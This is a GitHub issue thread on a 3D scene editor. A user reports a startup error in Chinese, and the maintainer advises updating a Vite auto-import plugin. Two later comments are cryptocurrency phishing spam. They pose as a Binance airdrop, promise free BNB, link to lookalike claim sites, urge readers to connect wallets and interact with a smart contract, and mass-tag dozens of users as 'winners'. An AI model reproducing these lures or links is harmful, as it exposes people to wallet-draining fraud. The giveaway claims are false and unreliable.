### ISSUE TITLE
项目启动报错

### ISSUE THREAD

**Issue by zhoujingfu** [zys8119/3d-scene-editor#1]
你好，项目启动后报错是什么问题呢？
![image](https://github.com/zys8119/3d-scene-editor/assets/43539608/8bc17c7f-6e3d-4951-ac6f-2d34f6761945)

**Comment by zys8119** [comment]
如果你是windows系统开发，请确保vitejs-plugin-api-auto-import 依赖是否最新，我自己本地没有这样的错误

**Comment by gazrogers** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @EastLee, @lipengyu2006, @yueguan, @zp1996, @cyio, @Sousukes, @DatouHsu, @zykee, @cristicVictory, @bonjovis, @yy9306, @bobiscool, @Limsanity, @martin823823, @leonardo-luke, @cdlgz, @dcy0701, @jimoful, @ClumsyThinker, @SoXeon, @allegewhd, @notmap, @edward32tnt, @shz8, @icepy, @Gaohaoyang, @helloyou2012, @ScnuWang, @whnarthur, @ker-ge, @Rankyst, @j4n17, @tsoliangwu0130, @shipeng331, @guozheng, @wuding129, @imDazui, @wangzhiwei1888, @ukamoy, @blakegao, @gglzf4, @Louisting, @SecretCastle, @jingchaofang, @kaocs, @insub, @mr-zhangyuan, @cxliang, @xiuyoung89, @sir-bravo

**Comment by minholee-itruck** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://claim.bnbchainnetwork.xyz/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @chenqing-yuhu, @yihongyuelan, @502923093, @axetroy, @fanleung, @leonguo, @leoyoung07
